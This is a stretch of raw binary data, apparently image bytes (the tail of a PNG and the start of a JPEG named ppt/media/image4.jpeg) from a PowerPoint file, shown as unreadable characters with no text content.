.....p..\:..RDj.M....*....Q..++;.S...1H...ILbxy.......Cp..c...7aI....u..+.^N..:....cI(oQ.,!.5.[X.d....O..N'..v...9L..J..t.F=..P.e.X!e.A66......bEB........^_......Hu8.C........Q&)f...Z}=.....`.....|......P..sd......"JD..UK....PL..)Y. ....#^].P.@....EBq.Y&.&....F..0.@..j.[?Z]..-.N.sX.+.."f..hd.H.GFb.K6.(....q.+\...........c.E[....;{}}...>3o.+..:.-,07B.x.a.2.......+..O.Y..}S.kF"/2...3..G......\........<.....C...t.@$.[A...*Z..ffJ~.N"CS...B.....+.n.....f7.....;2.........M?.H.G..H.......7...2..........~XE....)...6..:..5...U.qkD....:TT.L....xdG.#.. ...r..q.3.r..{..@k=..cC...I.dO...H.kW<.^+Pxt~_..d.*,t....76...M\p8...."...{(h4.671.LG..lH..,.P.y.u..F..c&..W...[.._.m.de...pm.#m..il..._...G...^......d........!.."...V.%...T.............UN....`l.-
....MT'....do/5&Bf.9......... ..mV.K...5,_....A..._.&>...Z,q..........X.. ...4@r3..p...O......c+...AZ-.6.).]m
8.`n,.....-]A.."..4.2g..#......<...*.+0..3e2.;...2.kM..sbrmu...N?(.c&......x.2    w....2f....8../..7..W..'...h...''..V_8.!......,/...!>._p{]....|E..C
.....#.>w<...p.{..~13N.x....@.w.{.Y2.....FZ....yTD.....\{.|.G...?.M.N
....uknj..Z.[-.x.
........P    s.AD.....C..M;.....,rfu,.}X_.:.T#Ga..mEg".o&ba.).S9U*........ce..*-.p.\6..bA*.M."....c.oYO..]5..................Gb.@...z..5.h..|..../.........:..hL...[.......P...S.}./.....2.s.n....r..h.Q^...&.h.[V+f5L*....?.d.[.*.c0.J....>.....V.......o.-....PAa......R....C...^...............N.L.rV..Q..n..4...G..)C.h.;...Y..../...E...Z....U...8
.t.\lS...Y........4..V.P.. _..^.7...x......\...9[Vf+.ip8...Z[;....]<...../X<i.29..:..D.4R.....[$^.c....]...5.$.....c..P8..rYcn...-......!...N..^m.2.)....#:..P..77u.v*X..m...iw(s..9.4".G3.h...n    Q...L[.K#.-M...
....H........y.Sp.%n......s...w::=...Tg..J..e.M............49q........(*.M,%.F...=S.....6>.7&Ma.s.......Q.P.......a$...%.?Y.......6.E..D.T..%7......c..*7.
.Q..B...,Yr.C@.gRX..g.j...'........x....N\_ia...R.....6.....;.P.V........Ik...I.b..X+,..PK....D.`C.f......Ar.D*.;. ....X....1........4.......rs7../g.Lse    <.k0..|..k.w.F.f..uQ..EZ........az.......O<....~w...,..f,//3.$+26 y.v........D.    #......,..1...G.-.~..*.X].{]..,/..kNK...k(...q..........0..D..g..j+..;z...K.N]...y.TfP;...!....i%X'FZW..y}..:........m.......G![..i.,km........... l.`...Y.zS.D..k...M
;s|sM.........3.N..u.H- 4..).#.....=..G.O....Z..%.f..(u...^.q.."......=N..VPx.3....(..~....
   ./...l..........t.....dC...QS<z..N..R.....$..5..9..J.........Z.J+Tg..'.T.j..a..u.w....W..=._2..c.S.+Pw}.........2......:...g.r.1.;.Upa...*........YY..G.....]yo....bx.XR..Q..]YT.zl...}......K?|......t..,.H.....&.6[f.#.x.Hm`2....[.\k<........zeK..AB.x+w37B..2.,.).).TOS.9.:1.;..P..q...'/..fa.)~q......V.!..@<..?R/...f`n..W.....    ...=.wNO..V...].{fr._y..km.Z.7..../.<.....FB.H
.H...    .t..4..pp...}.....B.8Dt...-.&/..-.u.......|Ey~yM..E..Xm...U....S..S...s...0u.k....N..F.....5....8WU..&&m.Y.J..Y.
....Y-.$..
.... ...$>J...D^]].Bss35.){..HCYu.S...q../<.....-..............iUj./.n.....5Oq.h.[."w.t....#.,........8^..'.%...J....."..r......!.........P2...w...hUj..e#........OW`%....1(......
hd(.....0...u.......Ch...P}..g2"..9j.....a..TtY..
....5.....\..._.....-..1..fL3.J".~*..K.>...........q+crz......C.2....=.xE..O......0.....Z.....AXV0...B...U......U'.I.G..A.2-s>.Rl1..=....bh..g_V.1....D^M.....i.t    2g.......qN.......?43u...L`..,~.1.9W1..jRyn......s^St^..#-]P.=Y..+.l6.....U.......G.k.9e.f.X]KVBS.+n.WT...-8.;...[.(mQ.L)...Lpb4#.eb...1..........;....[...O...9$5...(...o.T.0.'...7/.m......z..W...u.K..3G......F.....?..I...Kl,.l .".@H.....z..    A..3h|'..y.UL...... /K..:.qZ..F......,.L.:3..;....y)......n...I..:4>x;R..T?]....Q...vl%...
l..4...;qOH...OS...(....hf.._|.{..X...d.-r9M.U.fE`...V..-..Wx.*..m...u..yU.Z...p.%.D...............].W............!..'............[.:.....$.-m.....G.6.s!..j.Y.......^....L#....#J...F.z.a[d.6..@..bQ.".KF#.K.*P..u...#    Y....".=..T+...J..A.w:...kd..{&.pM.....2..{e.....>..........!,. ...B.o+P.s..+..h7Q...........Q.a.J5lD.X.W....d..)P....m......p..g........J.h$....C.5KJq)f.?.c..;S..c....,..s..{.!.`    ........5Y.;)....P.yt7N1Z!..m..6..u......5..
:.z...#E;s;.uH+M..=.Yo..3801Z.r._..NT...G'. kW.VSEx6.. ....3...V.7    ......p8...^Y80..k{...,$.........x.-    ....'..V..!#kY{.jg.^.."k...Y.......C..?.. ....XW.[..JD]...H"9.5,.e.._.)".d.....o.5.....;C..c...tB..*....S{m..)$m..X.....^.\..k.;\Q...,.{Fd}.:).......]
.K.tb.....z9....U...G..
....s.<T...E.x%.........*Q....$.
l.U.O....w........#k..D..Pd...........M.Z(...W+..5|.pH.2.e..T.NmF.C......~.Pu.2....x    ..77.....Y......Xx......U..l8Y.....#....U...R....H..D~.c..}.    =6.b.."O64pomC..TV...I.....LV2.......&............?j.{j...s.y.V..k.a....t    9...F....$....[.7......=.*K.....83..[..ez..@.;.M.........G.....i;F....rky...3*z6....ft..............).    ,..k.    {C..^.......y.\[{f......`...oo.0....@...W+..%..]...c.Y..Q....O&
..L.(.?.>GY;D...;3..O.w.V.().......&...|..dq}ej...:..~.    .....B.R....0.....`.&P..8..0..."...#.D......N.$........Q.s.....s...s.....v.....S....5....:.|T(v..o..%y..oE+..H^.E.&G.X?bAi.B.i....a...+$>h.^.i....VVox=..&J..Z.....F..d...c..>2.(.Ro
@...T..}......].    9_........=.,H.....X.c.J...A'dNuw}...o....sJ+...:.+..x.;yg.*1@......tV.v.1Bz.v......"8.X....gG\.,.'z.R..;.t...p.w.Re^I".."..r..HESYwS[..X.R....g..D.\@l.k..}.....eJ..)2.K..X...%Z...]V..Y.EN.........o,....4....j.....c.._..........y......[...../Ej2\ex.d(-}..Lc2..9..k(RbN.4.km....B...    .....BS
..\.p[...}B+..UQ..dF.6..E.l........&;....*.*...~/h493$.7......3%.;.?.o..YJ.f...e.......q.j"=yf:..~p,..K.2|,...@.XL1"/P.j..a.Z!!...h."..............:v$.=...-.....m.|v...a..er.......<.ZW.U.fs.......S.......'.........:..#w.P&...u.......M......}...`...=w.r.UF.L....yU.\......[..X.-..I.\.m..J..N!iCC4Lc..zH.w.
.........f._"JYV..?o..m.U...D...*.Qf,L.`..*#.p.....\b...EY.t...<...b...y?./..]..~U.."r..a<....BP].Q..k...    ]....    ....e....v|..9.[8.ea....^...b...5.....z..C...A oc......O!....9..6$..3...I..M..BO.........z.+./..EV.m.v...7.K.*.u..w.._...+....d..|......".hL..m..."...x..%.N....aoS...od1S....O..7HAD.X........N...&KTy..5..m2K.:......=..G./_^?uj.].<@..Y...\....&.G..~Wptk....e....(3.I....D.ay....Z.<..w*E......'.-.u....l50...*!EX..x.....IEND.B`.PK..
.......!.v...............ppt/media/image4.jpeg......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......x....".....................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................
.....................w.......!1..AQ.aq."2...B....    #3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........m.x....q..P:.?.M^}us,..~!..W....s)].$.Xu...<
...}.....In.G^....M......7...w..I.k|y.......?.X.=..X.-zk{.#.f.6...2...}....5oP..Y.#5.....~.n.T8'.....9....+>e...?.M..e....K5....X..4..&...6.<o@...L..........K{,.....#..Fq.g?\...../.j.....&.Zf...7....q...1.u...g......8Ss..uo.w........5...o.K....Ki.#..o...U .5E.M...O6..6.....U..v..zR..2qqz_....r.J
JKTwTW...<...T.....[..U`9|...=?.t.[B.e.[.Ks    _.i.....
..!U..0.a...."..Q].(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QEe...q........=x.......[..,..n-..-...!g.9U."y..9R}.=_S.G..u    ..!L.O...T{.@.../.2.....x.+V&.-..R.#....:.c1.pw
...;.....q..0...Qg.cE".......A..........K..KAu|..!L .8....6.........N..Hno...*<.YUv+..NO..@.".o4i...nb".[G..!4n.F..$.0..^:.zU)|9.j..\jQi.4.OE....v..4.Ih..l...Oz.t.....O.o.?q....G..U]cOm9[k]..0..`.q..:.x...=......Ks....}.,r).r..p........{..Euy.K.e,.~..[...'.8..`...$....g..~..n.....E...=.......b.~.......9.......%}...d...u(...;(.    .4v.p.W.<...8=.RC.h...i.j.2....%.4.i.|....>..z..z......sX_.Cw5...h.y(@.?.........V....;,.}.k.7..NJHf..}.H...4t.O........}.Mel..5nJ.<........n1.v...9.j...Oo...u..S.t.Wif1..B..a[sfE...<.....|<..Mes.......a.l.n.6l...3...+R./....^........t.....~^0    ........y..................%......K%.....^].x......0;..Q......#..rd..]...E....ml..).....5...<L.l....'%L2&..r.........K8.t....MR..L's4.Q7..f..7]. v.K.........lu..T.Xt.Z..X.<.or..S..    ....|y.h..U...R.s....L..K|.w.1.#....nd.......{m.m>i....c...r.     .5jm;.wWV7.i.$76S.,Q].D....2y@.<...#..<;+..].....A.i.j.5=6.#;..Ix..+..sc..NW..s....A..K.W......1..(..gn.<.....\.^..t...........y73<J.y....1.........[x...K..i-%3.....J..f'..'...O.8.......c.._..aqq....3G..)y$...(.I<.Y...A.L.S.[.^.&.%...bF....<.3.U?..L|0.G.5..O..RJ%1........B.:...htMc...:..d.:......m..-.....*...Pg.0........%.l....!..X..h._..Z..!Y@`.)...O..v..G...5-?.J}2.L.M..[..m.2....+......t....]..s.....1..o....">..E-#|...|.F9...v.w....l4.uhE.....K.!e|;..Ae?1.....5..o..X..|C.>.5%.4..$...(b$.H..p..=.F|S..,q.{K.J..O.G..C..y.H?Bc...F..5.F;..}N;.-...DT...vE,..s.q.;d.{.y..........T..]...W...7.t...G#'    _......~'.....I..T3....op.$..0]r...pp....p.R.n]2..b$O......~..X.9.....?...z}...._hX.x.....C.....P2Xe..$.c.....{........7...2.G..l.G;Dc$q..P@k..........c[.'.R.;KX.n.....4.$..rY...*7..p=...0..f..8c...p.    8..r.ax.3e.iz.Cs2.1..b..
...rD..m..e..Nr...A.6..=....av..........H....[.>.X-gm{K.].......A..s.`..ze...[.B..=B.nlf.M.......3..p......O.+.OZ...(....[i!.W.......A.).r..1...[..k.F.mn,.9......u>d^Nce..S...s....r-...../......m.r.u..@...ZY.B6..bO.o.....]<K..u..z......b[./&@a.g' ..bb[xsT..7..X#.....)ZUE[q....-.A.*....'..e6..u.k....X. .........p/?.o.pz.=S..}7F.g.5.K.Y.,.S,J[..b.x5...Z."#s...fv...{.c.|.m.{.5.kZ....^......SZ.{.6.&..m.v..>....?{.".}...a...<E.ZGi%.......V...N.0S'..:g...~'6.Q.;?6...+.x...y.8..pv.....!<..Q|.......y[G.....X..X.5l..dH.y..1..<l^h..T...iX5Ho|.ugs..[w..K....$.9'.v\.[....^..C}..,.........".{...o....c..?....i.-...;[=cO...?5"....?..9#......^h.    ..vW.iq ......r.y.CY..z]:.)...e.].R.Q..9..
..g.....3.g.....'m4..../....#9.
2v.O..&......bo-c.H..E......T.[...@>........m...A3...:U....yw.*....&}C..u...h.5...4.q|..fr.V........G..h\.?.m.7ohd..n/'.`..b.,..,.l....Tw...z\...............A.y\..#.qYf.?._...%.K.^y......).T.<.]..:t..iZxsU.....O.m..-..#..!s!.c..9....@.3.........*........".Bo#.nR.<....`MKk.-...-l..>..H.......?..9#..l.15....C.l.W.t.s...*..rwH.8.z.i...c....m.]_..<..~.8...L...p2Xo.........r..q_i...B.z....`74,6.v...kd......u.=.......p.2.0.. .;.Y:.R_x.G.8...H...P...V.*..X.'..^q...<'..y.,..i.&.a.//.21Va...f..<S.....,5[...CK....-.9.x.2    "vuRr....ey..MM.j_.......M<pE.......8.e....]..O.w7f.... Hb..x.......e@6..2r2FE.....Gm4..gg.I.n.y.+..............w.Z.C.y.....9Kh...w... ...........!h/....5RX0.>.aU...Re..$.p..#8.........y....V....([.dpv.U........s.).Gmue..'t.Q..Xd
.v..1*v)..G<.8.y<G...e&.}..%......2..Wk.H$..i4...z...i..p....\.....N....-..9.W.y.]Y..iWU.....M..wg..w.L[..m.!.x...u:&...Z..m^...h.I..V...(A..    ...q..]_....E.R...(..~?...d.b?.:.....+.y.7Ns.......AXc.: .~..YL.k....1+.....l...p9.=h........Q|B.i.w7:d)<B!..W.Ir.#.U....>..+.d..3f..Z....<?$w.^.D.f...1...XQ...?'..w.....$V..4...:,m....eU9P..J`.F.0@=@...5.Yl1.q#...Isw,..)@wH...........?....z....}...........3..#bcO(o
e.T.2.x...........l..Z......0.F..H..s.A,0p..n..,.\......k......J..H.WtA.9.7.W ........>.q..l...F.D......9.......1.;]..........y.e..5.z.M..J...5/...uue.....%0..ey!G+.A&.4..O}.    t.......$.l.L.p$.^5.....=..hY.kK.h.8.$.9...\..;..c....6......4.].F..(.c2....
O{,...."......@.=......G...="........n-@...-..8......Y.......l.N.x..[.5...`.B.k...0Yxi....@=....k3Z]\.4.X....^2...88.223.p..j...t..@....S*NQn.X.D*U.A...W.3...W...>...].....    ..Y..i$t}....N.%..1.k>..W.....I...>.+k....)..6... .....N2x......$Kx.,...2N].f<..k.|!`....w%..\..p.}.U.
F......).................u...K;.........%'y%.a(.v....$.X`.[.._x.Z..4.X..l..R.<..WV^j.^A.S
J.W..r...k..C.g.nl%.kq#K"ol.f.X..N.A.`...g..g...-.{g.K`F........EC...cc7...q...^...1......'...x.]*k+{@.@.5.-.*.    <..wF{:3.|.../.t.......{.d.....q.t.d'..T.........~7....K.#.~m..q..Q.No.......'T.X.`.m..L..y......2....3m....b..M.m..4.. .5..FT
J2.\1.1.A....om.e..y6....F    ..Y..O....U...R..Z....kf..7%.D..B    ..
.9.C.o...Zn`..5...y/4...2@...D.#.'3A.%z....W4?...z....LZb........9..!..O.X...,6w.........-.....~U29(9?w...^..t.=BK.{T..H#.gRy.3.q.....=?.....'.......\..._i...n...ZYi1]Ed...dc($.M.............f..?..3....+mF..H....2    ..Q..(.......]wN....B.....$+.E.....8.#-.').....I.4..i...'......;...I    V;.D.l#i 4.p..9..~.k/..wV..xm%.6.;X! ..y......p[D..$.....&....\)...n.U..... .Vt..|F....|7....]...0}..........hj.....e....v6....m^.b.gR.['..EM...=...%H..7'.5O..z].......P..R......*..l...'.#..O$u.6..vki<[.R..q...^A..
...kK.n...w.7...-...gL.k..w...r.O....1Zjs..:....5V.f...X.m......M...l8.....}........$..m.{h.........9%XJ*..B...K...T.Nw....=..&    #[.Rg0O$L..QJ.0+.E.).=.Vo.[...&.+[Og;J%...J.1".3nm....*..0Z.....{.iu....c.Y\.C%...kx..a.s.;...~Q......^_...X....&..%.y..s....v.b.!.....sR]Y..W...%}@.w..E.{.....IP.vrT*..A4...>.-o...K|..r....\2.\..6 ....9'4.............=^.izM.....~.?..._....dC..w.&...K-.?j..y...T...Kc.#.N+j..;..2..m.Y.).;(8. ...*) .......v...r.a.W.W....s....... ff.syq..h...a.[.s-.H...dP..2._.T.0.NF
..izt............N..h...."...6.AX......&........!y&..O..V...'F..O%OC.....w..vw.P3\yW[..o.{..U.......}.v.t4y[..K..43.........i.kk=..s....I.w.xC0.dd&w...:....w.,.{...4...Y.1.J4..pq..pq.V....l.rE........Ld%.,.......H.q..u..>n.]W...O...$a..........y;N......G..1-<w=.....w..j..y.ID..Js41......~.._..9k..-.............._/p.s....c...O
[.P_\.yr..G.....RW%.0D|.........xb=R.Sf.Z.Ip.......fT.,l.o..8.A....?.._......j76..6...0..<..".[...    E,.vs..t.mG.4.ZU......r.%..1K;.n.3...P0.......F...4.4.+;..g.....s,..+o.e_qR...7A.H.g..o...{K.>+{H.......QY..(....1.H'w.s.=/.y..........^..U.7r.....}...S.-..@..c)......V\..._O.....E.:-..k.-..Cq.B..f..B.@"Ry.g As..mk..M.. ..[{..8....e.F.2....n...
...f...L...G..y.....U.$e ..n...Nv..........]
.kW.....^....z|.Nb.!D?1m.....)$....\..Y.. ...K.as~.P.U%.">Y.    ........q.w.i..}......o.b..x.....2.dd..#..3x/B.(...r..6...........,..n...h~_...0^c..K.{....[.Z..d..0....<...oQ.)..59&..-..[...'7.../0....+yG....=kCP....2j...B6K.X... ...:..J._...;
....6.Hf.[uyu8..>S....O+..I..p..Z.?..V5........I.    t}.94.+.KQ.3.7.#.....E.N......pr4..N......a..5..O.."...... .D@...X.9....S
......3.B=O..D.@@...UB.A..*....i..cZ....d.m.e...Q.G9?1/.q.Tc.i.wrzX...%...n"..x.Wi..n...,c.....9.~.zg<Ui.]}.....B.u..0\N/3'..6. B..4g......u.....G....G.(.E.:.[...v2G"....._z...i.....f.M<sGl'. .dh..A.. .....t.Q.....!........h...t...Aq..p.r".. .)<.3.$>".g......"....kg.Qo7.M........T3.........#.......L.1w(..A....^..s.99..G...Ks..i..B.5...[]dQ..+...p....c.#......]J./........-cx.I..b.....@.....Hc...hZ....wW.\.......K.2B..D...$.....3.6.D..@....d...c.d.....1.<s..Qi...4{...).%.j.u,.....4f+..p.....r..Z....E.P ...O.a...VmU......9.&hE.....N..FC..Npq].c/.t...LI.k...W...-".fA6.,.
...
..b....v...#.....nZ...WW]B{.V.^..$.~0.Y&h.l....O@8..f.5..m=.Z.6..:.DF>... ...[0..."L......m....\.5...".I.n.q.nS....7..=9.<e....M...ksn.%...2..@..n.."..=.1.............3|.oE..\Re.....w...?...>[.s..)..g."../.OX......Eo.......n..    ...?.8.f...../C..V....Mu.....-.'..~...:.+OR...l.f..I%..Q.I.$...4..tT..;.g..Z..]....&.t...?.......).;......XM..........d.f.;..D...
8.=..qu..[......S9....h..P..#v..AQ...tZ...L.....".[4....[.1..^B.`.tp.l.....t........]%...... e....b....RvppA.;...~ ........:..$.M.7...........{.....:g.j6................Cq$y....FB..G......u...H...N.._..*C+-..(.p.CH...z.-..h....G...O9.#2L.i)@..ya..g,@.    c..r)t........m.......K-..".. ...F........$H.FN. .c#5.h.z........._.Dy.n.]...7&Gi.y..g..c.7u.........quy.\..\....BZ..C..:u....,.E.__..d.....m%H\...... .....4.........Ql....5.z...].--5c.'....4kG.3;    @..x..W...c..bN].......s[]-.....p.e..?s...x.~...x.I......X...-%...g.-[b.yl...i..%....e$.y.....W.6lmW.)D'+..~a.)-......>Ys|.#......V....m.Ef......s6./...Io........-......q...h>....u,o..p-....y...$g9#n5....i....u..BKI......<......b$........ek....\@.Z..|....p...R5R..B..$..k{..+].C..    .<W.Ks....Z........C......q..._..y&./.\j.\....o=.T{y,..C...}....    .
.{T...!-a...33.@.}.O.......dd.....-._mWV..Ih..K1}<.F.1?.*....c.8.F2r.D....}_......u..g.v.W:.....As
^....bA.H.!.......0.=~...O.mJ..mGl2.-c7.$80............4[...m....$3H..1X..;;yJ..M.p.gn...f...5.P..\..!7...s.d...Bb......p....M......yuw..cn...L..Rr$..&H..#..~o.d.q....-..|E...v...G..Zi.O.m..Cg..
./|W...=..q$.........UgD*.r0    ..8.f.....GO..%...5..RCuo$d...`..l]..0...M..7......hIt|.&...$..tg...ZI..q.6...K.x.y..o.p....5.....o....[_*3.R..U/...r>\.as..1...{.... 1.[.)...6."7@......}8x.Fk3r.].&6..c?.$..o.....7...J.........?.x..^....]y.+.).BC..9{y........j..f.j>..'....`nXa......=GS....O......K"2.2%..b
.D#.r76G.95..}...e.7.M.MAU.+..b...).._.wB.......04y....{Y..o.X.K./...Y%.F...|.m........j...\..k.=...Q.7W2..l..9...)./.p.n.......P.K....4.RD.......0K0b{.......OM..Di.df..'d(.f....?..8....oV.......qzN.ws....3k.?e...;%....#..I!c...RK....O............,0!i....r.....0........
.t...    ..(.k......@......G...g6..^.r.&.isi....w~..+.!.(.....b. ........M]X.|As4:..u.......v&..KCnd.0%?tI&PC...U{[}vo.L.....K..{x.o.-....y.gQ.a...#.{9..........t.....od...g.U>...y....w.Y.......7y/,..t/k/..H.....!#i....u........?R.......9=3..76>.K.o..t.>b$.Vr!.V.;    .$#mu.~R....t....P...$...+.....a.,{....@.n..0.. ......E....|..UC*Kk,nw.&.e...!v...2j...Y...%.M..."O.........pA...T.....VG...W.xv.mI|Gfc........M.7y....1...q.;....7......<..$. ..s.P0z..7.}k.MwG./...|7g&.._.mk,..;Fn..*9L.W.v..s.f.....]qP.k...#.6Rl...I.l'..Cg*F28/......{v....Z..-f...u.7...wo.    d.!)..]...q.H?{...rz2x.!.).jrk/...C>.t.-....i..wgh..9....|U.1!o.........J.clc<.1.....<E..jMan.(...IV'*p.e*..9.1.}+t....;.8-9ux..Ac..n-.....>.    cC'.|...I..g".........u..\.ez.S_...U&i$Sm.1..\.......Z..+A.....mikh.....WVS..........p0A....H...6..n..\YM..1..G@...6.....i.._?..
.d7EO......is...m$~^..q.5k.....t..K..[T+%.......O.#..........1:.....t.E..l.Z..c.......*.._..........F..:0.9].1..6....{........G.....9.g.    ......f.....y.E..)...9?.U9..H..EdiQk.c.-...%...`...@..b%....N.)<..n..:'. ..m.I..|L....U........@7.eP..1[?..iuim....w.M....`cr@rQHU.....8..mu......3.....Y-..l..%.i.%vdl.Y.....A\v...vw...ocs5......(..i...q.A.........^.$.m!.4...I...n."..w6..|.....T......w1.....cl..].|.H.l.....G8%G..xW....QmZ.?...9uO.jqA.....0....._.B.........GsT...B}[N......$[...2"......q...&    ...x.]...e.i........xFc.`.0..K...fC.]
y......X....1....!d.2w...r1.._...v..K..O....s......J]JQ..d.N..fku&m.$w
..s...'`.p+..&.]S[.K}'.v...h`cV....u..    .....x.L.D.WRO,..,kia4.DRlq.C...    .y#.....O.....$e.T..kg,..C...!T...........osz..=......I.K.1.6....#8.8Ry....&.m.3.....HKZ.O>....-......>..5..... .Z[Gq$....B-......\.R.r9c.8....E.(...+...5.........^.],......(..&fnf8.i....}\z..Q....5..o.G%.K...I...s.'.r.(....q..R..i....ri1A%...=.............
..'..&....x...r\.....onb.I...*..........bZ....hY..v....E.I.X.~.#F..O/
W?}Kt.....x..Y.B.....v..g[I.aslpb.r...}0{...G.i.K{_....
k:?....X..M....i....'~.m.6.y...j......k.Ou......G...`$.r0.H....x.no....Z.#I.I....."6R_vT..........1.i.Kk.....U.H.....q......j%..............e....4..Xi.._l.W.{..?5n..'r.V...?.........,V..;Y.........ma..1:..!X.1.1.u t....j.....i.bD.r.........C.$.Rx..u=[F.o.Q..n..}...rV9..o9`@....I.=o.........[P.......H...s    ..4.".8.I.Ah..P... .....P....4........."...Ud'....23../....o._Y.#\.A,71..d.A.l.x....N@|.O.b..y..(f...    .bKw&H...J.F$.1.%it_.....;.ZO.?.....p}...~^...H../.
.c..;.=...E....uk...[x......hCH..&_0.#.>m...'.T..#...&..p..hKs...m..a.v...%.#.t.Y..,...]....]...kXn...Dv8&vw.........7.OO..............]/}...rY_\.o....]......N.A.`g.r.....    uH..L.G4.w.%..2.......Q..`..A..k.[T.a..),.]F.E...>....vx<..O..eXXA._.;.GU........]FkU.Tb.l...Wk.`I.....g.....[..}...
...$..Mim.M{._f..".......pB........E..h,.V.kml..v_j.,O#....g.........J`.....T..".m......2.^$1.b ....x.[1A..<C..{.^...kmkg}-...5o4..K.b..H.0.;....._._....(]h~ .!......5.I...1,b7el.=...........C.t......?....Z6.D..Q........W.g....-<Iqe..:..:m...jn.O.:....7..'...$......6....+.X. ._....e...V.N...<.Zk.........C......k.P.g.E'.......!WGG..u`G.......[.n4....[i..4.|N..:..2..... .rA'..J....(.n-..O......l..x.]E...]@......),....yXP8.?tq.....O..}.S....+.....Z}..-..Y...UR...U!....8#.S..R.......X.....x-..1....Y....8..A........i....j3yr    .d.K..l.EVb.....G8........5-1dmZ...y....i...p.....9$|.._...[.....[]W7......\j..3......f.T.a.6...b0N..0:..<#..5.......n...3...#.
...1.....5w.......Y..mi.........0J0..O..V.X.>.we.9|..V......(........V].{|.:U..n.mg-..rC.V.V%....?.'.......7z...Y.w:..Y......,[...Dh8\...L.\.7p..TF.....!.+y6......@.......`..q:.b.V.I..&i...R../.......v..............t..~._m..5...M.j..v.ay....B.........P.5....x..!...
[....9.xU..r.:V..o.<Z..nng...I$A.....1u_.......&..K#.............Op...B.>..$.G.z............o.c....K...c%.1.,z.............    ..E..-.'...o,...wb...T..I...'.`.d........k3D.W.D...;..O..o....YX.....N...O.....j...".x.....R..\.....>.<......+v..R.<.o...e.........O..!...I...v..P`.z...+.>..i..P..t.
..-.!.6s&..C9 ....u'?R.o.=OQ.}.wvZ....    t.......;\....OL..M...o..5..{..V..[v.v..A....j.#C....ri_O......w_.....5.....}...<Ko.h...P4R4.YI..'.x.<....|?......[t.....M...C..T3.}...V..d...I.P...T.$..K...<.c!.I"0...@.....G...E.....i...Kd..c.J.._J{_........0/<....`_4W....    ./...y.    ..HN}P.v..<........G....;.HCy..+...2.....{.O.y.O*4.u.K..&...`...Q...>......<2.i2.F..M:.".&uVp..j.rF.2F.%...O...OWn......]..b....j.....a...C.1...!.".}.>cV..
......j...21...kq+1.........V8...I.4..[I.......B.....'...N.q.........u.kP...u.5....K..."%d.Q..<..Y.w..A..../...}..S...5..>.nfo'R.K.EQ.
d;.9..gB1...`G.....,...~p...t4......K..    ....g.$.KNMFMr.t..[y..k2]@.(_.....'..~tj^=..E.T.m".A`.....2 ;.D.<xV......H......]Ji.....kY.*.O.'.....`.7.}.G....c!..nbC..x.;.....K.imk=.....w.b..i$i....7c.j..V./.{..\....WQ...L..YQ....'..AV..Fx....>.cia....6..#.......G..0A....a.....24...^......K.a..O..    .......rv.R.(.....{].|8.,..]<..Q.|..b..\..%.c.W5..u7...?o....;...1`Y'.....v...1.r}Z.....k)n...d..Nw<..#d2..*.m.9...;......)...[....7<I._.:rZX.[Y.5$w........D.*3....j...5    %x.X-....j..e........?;.w.G........u[.:.Y....}^KI.K|....Q......y....m..^./md...........]F.$acg?"..$&..:..
...!_...............s.0m...T..G]..l...s...h.....f.m}..;<.'...|...t8....[.>.Dp....k...DA.[..T......./<f.A.M~cmb'.]Fk.m'..M....I.c2..1..!V...O].....;[N...;._`...._.......~.2..?......+#..K..O.u[xE.1B...4wEP......z.p..p{T....a.....r.Yj..<0.F.9`..0...+.9.g.Ic..."j..Z|)q..ov..,l.38..I.....;.<m.E...............I.4....\.....7y2...22;...H.X:..c....c..h.a1..;#w...2...K.~c...sQ.x.W..7.4V.Y.v..L".........e...BN... U.[T...c}.._D._a.As.2F..rB1....9S..f.?........_.R.....!j....}6...{wy[.~.....:..y....4.oU...L...E......g
.$*..c..I.M?.u.u....-.L...gi<.HuF,].....<....8......_O....QH.....6....M...
Irm..u#...H..=.B.k?..kuk........w,.k...<.6..r..Fv.=.....5..4;.Y.m4m:...6M.V.."...0G'..j[..J..4...;E.0Ao...1...1...\.J...x..........{.m..${!..p7..    .$....9.'.7.. :....n......\.".Dd.....|.`.s........#.......o....]Gn
.........:........\7.4+......, 0.....n.|.|...K.p.Q..q$.5...o.^^i.....S.O<'.w.F..@cF.<~....o.]..c.a.W.........@.U....s..x.*-[I]Z...W..[.&...f...I....Y. .k...(....4.n..D..9..X])..)'*..N.:..Uu.
js.....MJ.V.    -....%..@..*...V$FH`...v......_.wK.........U.../.G
...v.$.E'q=8...+7S..9.......d...N@..lP:.y5.XxL....i.C..5....].a.v..-..!...y."..Z7..'V.,..L..'e............r.<.M%.......].#_V..M..\..I$...O5cS*...U'.v.2....B.SP:.ZE._Hw... ....|g8$u.^mg..f5.Z-"kYo4k.y.%...r.6..?1\..JI..FNz..ig.....-...o.ml..f.3.).3.p@.N..p).........y.:kTHQ....<0....#....<.q....0M-G.Z..r.:.......Ksj.0^...q..O.>....Rf.g..]Mnb.?.J...h..L.]7+.7+...u....H.?:l1..j-f.$p1.8.....(.N.m.N.............%...0...-.....Q.%.u.y..*    ..Y.....c*...Awm....>Q..t..8....-.......(`.Yg]....N.........9.aj......L.V....Z]..)....2....m.+....Oe....Qy......N.....;u.......&e
1. .....5...<9...@..|..Qy.q.....G
=...Y......wv.{h....#fl..f......O.P0..j.....YAz.ZjPj.i.A-...$7..0..A3.rCI.2I.....oF..._........i..'...0.p"..?)...Qs.n<...95.C.V...$.K3....bK.;.I'.5..zm..}...G..M.KKh...[.f.^]....|.......A...h.An.........!.......)...v...c...e..v.M.....f..#y2rw0.<..L.f...F.6.....S.....A....Eq....jZ..}.,.Z.../....y.@.bX..a......G'4.'.e..D...........1H..(0.D...8
